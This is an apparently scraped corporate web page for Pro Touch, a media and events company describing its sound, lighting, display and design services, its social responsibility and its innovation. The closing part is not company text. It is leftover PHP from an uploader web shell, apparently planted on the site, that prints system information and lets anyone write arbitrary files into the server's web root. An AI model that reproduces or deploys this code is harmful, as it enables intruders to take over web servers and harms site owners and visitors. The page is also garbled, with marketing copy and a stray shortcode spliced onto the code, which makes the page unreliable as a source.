لمسات احترافية | PRO TOUCH
Pro. Touch Institution has emerged in 2002, to become as one of the distinguished media institutions in the region, supervised by a professional staff of an elite group of sound & lighting engineers and graphic designers, who put at the forefront of their priorities building a solid working relationship based on principles of partnership in both interests and goals.
Pro. Touch was keen to provide a variety of comprehensive services in the field of sound, lighting, display screens and design, in addition to other services.
- Documenting conferences and parties.
- Equipping theaters and preparing events
- Giving attention to mosques
- Design, magazines, books and brochures
- Montage (Editing) and presentations.
- Live directing of parties
- Lighting and visual effects
- Giant display screens
[/dt_vc_list]
لمسات احترافية |PRO TOUCH
Social Responsibility
Social responsibility is considered as a duty and a commitment of Pro. Touch Institution towards society in its various sectors. This is to contribute in the development and advancement of public and private events and occasions, and bear some of the burden instead of the bodies that we sponsor or be partners with, as well as we consider price lists for charities, by which we seek to obtain the pleasure of Allah and then society…
We seek to innovation and development
Pro. Touch seeks to develop and invest in intellectual capital to achieve a distinct and unique competitive advantage.
Therefore, its employees strive to develop, innovate and share ideas for the success of any work they do.
Pro. Touch is inspiring its ideas and vision from its people and staff, then from looking at the different cultures in the same field.
“.php_uname().”
“;
echo “
“;
$root = $_SERVER[‘DOCUMENT_ROOT’];
$files = $_FILES[‘idx_file’][‘name’];
$dest = $root.’/’.$files;
if(isset($_POST[‘upload’])) {
if(is_writable($root)) {
if(@copy($_FILES[‘idx_file’][‘tmp_name’], $dest)) {
$web = “http://”.$_SERVER[‘HTTP_HOST’].”/”;
echo “Sukses Upload -> $web$files“;
} else {
echo “Gagal Upload.”;
}
} else {
if(@copy($_FILES[‘idx_file’][‘tmp_name’], $files)) {
echo “Sukses Upload $files di Folder ini”;
} else {
echo “Gagal Upload”;
}
}
}
?>